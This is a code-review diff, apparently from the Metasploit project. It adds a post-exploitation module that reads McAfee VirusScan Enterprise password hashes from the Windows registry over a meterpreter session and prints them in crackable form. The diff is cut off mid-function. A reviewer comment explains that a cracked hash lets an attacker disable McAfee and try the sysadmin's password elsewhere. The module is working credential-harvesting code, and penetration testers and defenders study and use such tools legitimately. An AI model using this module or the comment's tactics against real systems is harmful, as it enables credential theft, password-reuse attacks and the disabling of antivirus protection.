modules/post/windows/gather/credentials/mcafee_hashdump.rb

```diff
@@ -0,0 +1,145 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'rex'
+require 'msf/core/auxiliary/report'
+require 'rex/proto/rfb'
+
+class Metasploit3 < Msf::Post
+  include Msf::Post::Windows::Registry
+  include Msf::Auxiliary::Report
+  include Msf::Post::Windows::UserProfiles
+
+  VERSION_5 = Gem::Version.new('5.0')
+  VERSION_6 = Gem::Version.new('6.0')
+  VERSION_8 = Gem::Version.new('8.0')
+  VERSION_9 = Gem::Version.new('9.0')
+
+  def initialize(info = {})
+    super(update_info(
+      info,
+      'Name'          => 'McAfee Virus Scan Enterprise Password Hashes Dump',
+      'Description'   => %q(
+        This module extracts the password hash from McAfee Virus Scan
+        Enterprise used to lock down the user interface.
+      ),
+      'License'       => MSF_LICENSE,
+      'Author'        => [
+        'Mike Manzotti <mike.manzotti[at]dionach.com>', # Metasploit module
+        'Maurizio inode Agazzini' # original research
+      ],
+      'References'    => [
+        ['URL', 'https://www.dionach.com/blog/disabling-mcafee-on-access-scanning']
+      ],
+      'Platform'      => [ 'win' ],
+      'SessionTypes'  => [ 'meterpreter' ]
+    ))
+  end
+
+  def enum_vse_keys
+    vprint_status('Enumerating McAfee VSE installations')
+    keys = []
+    [
+      'HKLM\\Software\\Wow6432Node\\McAfee\\DesktopProtection', # 64-bit
+      'HKLM\\Software\\McAfee\\DesktopProtection' # 32-bit
+    ].each do |key|
+      subkeys = registry_enumkeys(key)
+      keys << key unless subkeys.nil?
+    end
+    keys
+  end
+
+  def extract_hashes_and_versions(keys)
+    vprint_status("Attempting to extract hashes from #{keys.size} McAfee VSE installations")
+    hash_map =  {}
+    keys.each do |key|
+      hash = registry_getvaldata(key, "UIPEx")
+      if hash.empty?
+        vprint_error("No McAfee password hash found in #{key}")
+        next
+      end
+
+      version = registry_getvaldata(key, "szProductVer")
+      if version.empty?
+        vprint_error("No McAfee version key found in #{key}")
+        next
+      end
+      hash_map[hash] = Gem::Version.new(version)
+    end
+    hash_map
+  end
+
+  def process_hashes_and_versions(hashes_and_versions)
+    hashes_and_versions.each do |hash, version|
+      if version >= VERSION_8 && version < VERSION_9
+        # Base64 decode hash
+        hash =  Rex::Text.to_hex(Rex::Text.decode_base64(hash), "")
+        print_good("McAfee v8 password hash: #{hash}")
+        hashtype = 'dynamic_1405'
+      elsif version >= VERSION_5 && version < VERSION_6
+        print_good("McAfee v5 password hash: #{hash}")
+        hashtype = 'md5u'
+      else
+        print_warning("Could not identify the version of McAfee - Assuming v8")
+        print_good("McAfee v8 password hash: #{hash}")
+        hashtype = 'dynamic_1405'
+      end
+
+      # report
+      service_data = {
```

Comment:
Correct @jhart-r7. The main reason for running this module is to extract the McAfee password hash. When you have cracked the hash you can do the following:
1) disable McAfee (from my experience even if you are System on the box you can't either kill the process or stop the service)
2) you have a password that sysadmin has used. It might be possible that the same password has been reused somewhere else.